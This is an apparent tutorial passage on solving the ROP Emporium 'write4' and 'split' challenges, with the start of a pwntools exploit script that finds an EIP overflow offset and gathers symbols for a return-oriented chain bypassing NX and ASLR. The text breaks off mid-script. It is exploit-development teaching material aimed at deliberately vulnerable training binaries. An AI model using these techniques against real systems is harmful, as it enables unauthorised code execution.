[ROPEmporium]: Bypassing ASLR and NX
Hi, in this tutorial i'll share how i did the write4 and split from ropemporium, bypassing NX (non executable stack) and ASLR (Address Space Layout Randomization). This script works fine to both examples. from pwn import * #context.log_level = "debug" #Enable it to use the pwntools on debug mode e = ELF( "./write432" ) #Open binary. p = process(e.path) #Create new process. p.sendline(cyclic( 400 )) #send 400 pattern to know where is the overflow. p.wait() core = p.corefile #create one core file with eip overflow. eip_offset = cyclic_find(core.eip) #find correct eip offset print "" info( "Found eip Offset %d" , eip_offset) print "" p = process(e.path) p.recv() #Searching symbols on the binary printf = e.symbols[ "printf" ] main = e.symbols[ "main" ] stdin = e.symbols[ "stdin" ] fgets = e.symbols[ "fgets" ] buffer_mem = 0x0804a028 #buffer_mem is address of .data o